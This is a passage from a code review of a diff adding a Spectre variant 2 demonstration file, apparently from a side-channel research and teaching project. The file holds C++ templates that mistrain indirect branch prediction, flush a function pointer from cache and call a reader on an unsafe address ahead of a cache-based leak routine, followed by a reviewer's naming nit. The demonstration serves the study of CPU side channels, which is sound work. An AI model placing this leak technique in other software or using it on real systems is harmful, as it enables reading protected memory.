demos/spectre_v2.cc

```diff
@@ -0,0 +1,296 @@
+    // Empty.
+  }
+};
+
+// Repeatedly indirectly invokes a real reader on a safe address in the
+// LeakByte.
+template<unsigned int N> struct SafeCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    real_reader(safe_address);
+    SafeCalls<N - 1>::generate(real_reader, safe_address);
+  }
+};
+
+template<> struct SafeCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    // Empty.
+  }
+};
+
+// Repeatedly flushes a dummy reader from the cache and invokes it on an
+// unsafe address in LeakByte.
+template<unsigned int N> struct DummyCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    CLFlush(dummy_reader);
+    (*dummy_reader)(unsafe_address);
+    DummyCalls<N - 1>::generate(dummy_reader, unsafe_address);
+  }
+};
+
+template<> struct DummyCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL **dummy_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *unsafe_address) {
+    // Empty.
+  }
+};
+
+// We fastcall the readers in the 32-bit mode so that there is only one
+// instruction. Otherwise there would be two (fetch the pointer from the stack
+// and fetch from the pointer).
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+FirstActualRead(const void *addr) {
+  // We read the value 100 times to have enough places to jump to.
+  Fetches<100>::generate(addr);
+}
+
+// DummyRead is between the two real reads, so that misjump chances are the
+// highest possible.
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+DummyRead(const void *addr) {
+  // Does nothing - only NOPs.
+  Nops<100>::generate();
+}
+
+void
+#if SAFESIDE_IA32
+SAFESIDE_FASTCALL
+#endif
+SecondActualRead(const void *addr) {
+  // Read it one more time to avoid compiler deduplication with jump to the
+  // FirstActualRead.
+  Fetches<101>::generate(addr);
+}
+
+static char LeakByte(const char *data, size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &isolated_oracle = sidechannel.GetOracle();
```

Comment:
nit: isolated_oracle --> oracle? I think you changed this in other files.

Reply:
Done.